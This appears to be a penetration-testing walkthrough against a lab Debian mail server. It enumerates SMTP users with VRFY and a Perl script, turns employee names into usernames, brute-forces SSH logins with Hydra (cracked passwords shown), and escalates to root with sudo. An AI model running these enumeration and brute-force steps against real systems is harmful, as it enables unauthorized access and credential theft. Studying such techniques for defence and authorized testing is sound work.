Attacking SMTP on Debian Linux

First lets do a quick service scan against the remote host.

root@asus:/mnt% nmap -sV -T4 -p22,25 mail.acme.com

Starting Nmap 7.01 ( https://nmap.org ) at 2018-12-28 19:39 MST
Nmap scan report for mail.acme.com
Host is up (0.00097s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u4 (protocol 2.0)
25/tcp open  smtp    Sendmail 8.15.2/8.15.2/Debian-8
MAC Address: 08:00:27:0C:B6:CC (Oracle VirtualBox virtual NIC)
Service Info: Host: debian9.acme.com; OSs: Linux, Unix; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.63 seconds
root@asus:/mnt% 

Verify SMTP service is accepting connections

To verify whether or not the SMTP is actually running we can connect to it via telnet and issue a few commands.

root@asus:~/pentest_notes% telnet mail.acme.com 25
Trying mail.acme.com...
Connected to mail.acme.com.
Escape character is '^]'.
220 mail.acme.com ESMTP Sendmail 8.15.2/8.15.2/Debian-8; Fri, 28 Dec 2018 19:31:58 -0700;
HELO mail.acme.com
250 mail.acme.com Hello [77.x.x.x], pleased to meet you
quit
221 2.0.0 mail.acme.com closing connection
Connection closed by foreign host.
root@asus:~/pentest_notes%

Data set and user name enumeration

We need to create a list of potential users on the system from a list of names we got during OSINT.

Employee Names from Company Website

ray barnes
eaton gill
melodie foley
gail ramsey
amanda ruiz
blake wise
chanda goodman
perry tucker
arden clayton

from here we need to try different combinations of first and last name.

examples:

Ray Barnes = `rbarnes`
Ray Barnes = `rayb`
Ray Barnes = `r.barnes`
Ray Barnes = `ray`
Ray Barnes = `ray_barnes`
etc...

our list should look something like so:

root@asus:~/pentest_notes% cat en.txt | sort | head -n 15
a.clayton
a_clayton
aclayton
amanda
amandar
arden
ardenc
a.ruiz
a_ruiz
aruiz
barnesr
blake
blakew
b.wise
b_wise
root@asus:~/pentest_notes% 

Verifying mail users using VRFY command

There are 3 ways we can see if users exist on the system. VRFY, EXPN and RCPT TO. In this example we will be using the VRFY command to enumerate users since we know its allowed on the server. We can write a small script to enumerate a list of users instead of doing it manually.

----- SNIP -----

#!/usr/bin/env perl
use strict;
use warnings;

use Net::SMTP;

open(my $fh, '<', 'users.txt') or die $!;

my @users;
while (<$fh>) {
    chomp($_);
    push(@users, $_);
}

close($fh) or die $!;

my $s = Net::SMTP->new('mail.acme.com');

for my $user (0..$#users) { 
    print "$users[$user] user exists\n" if ($s->verify($users[$user]));
    sleep(1);
}
$s->quit; 

----- SNIP -----

Now we can enumerate the server for possible usernames on the remote system.

root@asus:~/pentest_notes% ./enum_smtp_users.pl 
rbarnes user exists
egill user exists
mfoley user exists
gramsey user exists
aruiz user exists
bwise user exists
cgoodman user exists
ptucker user exists
aclayton user exists
root@asus:~/pentest_notes% 

looks like we found some valid combinations using only first and last names. our next task is to issue a dictionary attack against SSH using these usernames and the rockyou.txt word list and see what we can find.

Cracking User Logins With Hydra

For the dictionary attack we are going to use Hydra.

root@asus:~/pentest_notes% hydra -L smtp-users.txt -P ry-smtp.txt -t 4 mail.acme.com ssh
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2018-12-29 10:09:27
[DATA] max 16 tasks per 1 server, overall 64 tasks, 81 login tries (l:9/p:9), ~0 tries per task
[DATA] attacking service ssh on port 22
[22][ssh] host: mail.acme.com   login: rbarnes   password: YOUSUCK!
[22][ssh] host: mail.acme.com   login: egill   password: fulori
[22][ssh] host: mail.acme.com   login: mfoley   password: pielagorda
[22][ssh] host: mail.acme.com   login: gramsey   password: shin4ever
[22][ssh] host: mail.acme.com   login: aruiz   password: bubba98
[22][ssh] host: mail.acme.com   login: bwise   password: 241729
[22][ssh] host: mail.acme.com   login: cgoodman   password: almaleticia
[22][ssh] host: mail.acme.com   login: ptucker   password: sdsmfree
[22][ssh] host: mail.acme.com   login: aclayton   password: lak6510
1 of 1 target successfully completed, 9 valid passwords found
Hydra (http://www.thc.org/thc-hydra) finished at 2018-12-27 22:55:50
root@asus:~/pentest_notes% 

Verify remote login users and passwords

looks like we were able to crack all the passwords. Our next task is to test SSH to see if these logins actually work.

root@asus:~/pentest_notes% ssh -l rbarnes 192.168.0.114
rbarnes@192.168.0.114's password: 
Linux debian9 4.9.0-8-686 #1 SMP Debian 4.9.130-2 (2018-10-27) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
rbarnes@debian9:~$ id
uid=1005(rbarnes) gid=1005(rbarnes) groups=1005(rbarnes)
rbarnes@debian9:~$ sudo -s

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for rbarnes: 
rbarnes is not in the sudoers file.  This incident will be reported.
rbarnes@debian9:~$ 

The login works, but unfortunately we are not in the sudoers group. also note our attempt was logged which is not a good thing.

Privilege Escalation to root

if we keep digging we find an account which is in the sudoers group.

root@asus:~/pentest_notes% ssh -l aclayton 192.168.0.114
aclayton@192.168.0.114's password: 
Linux debian9 4.9.0-8-686 #1 SMP Debian 4.9.130-2 (2018-10-27) i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Dec 26 20:12:09 2018 from 192.168.0.100
aclayton@debian9:~$ id
uid=1001(aclayton) gid=1001(aclayton) groups=1001(aclayton),27(sudo)
aclayton@debian9:~$ sudo -s

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for aclayton: 
root@debian9:/home/aclayton# id
uid=0(root) gid=0(root) groups=0(root)
root@debian9:/home/aclayton#

as you can see we just issue a `sudo -s` with the password we cracked earlier and got a root shell from just a list of names from the company website.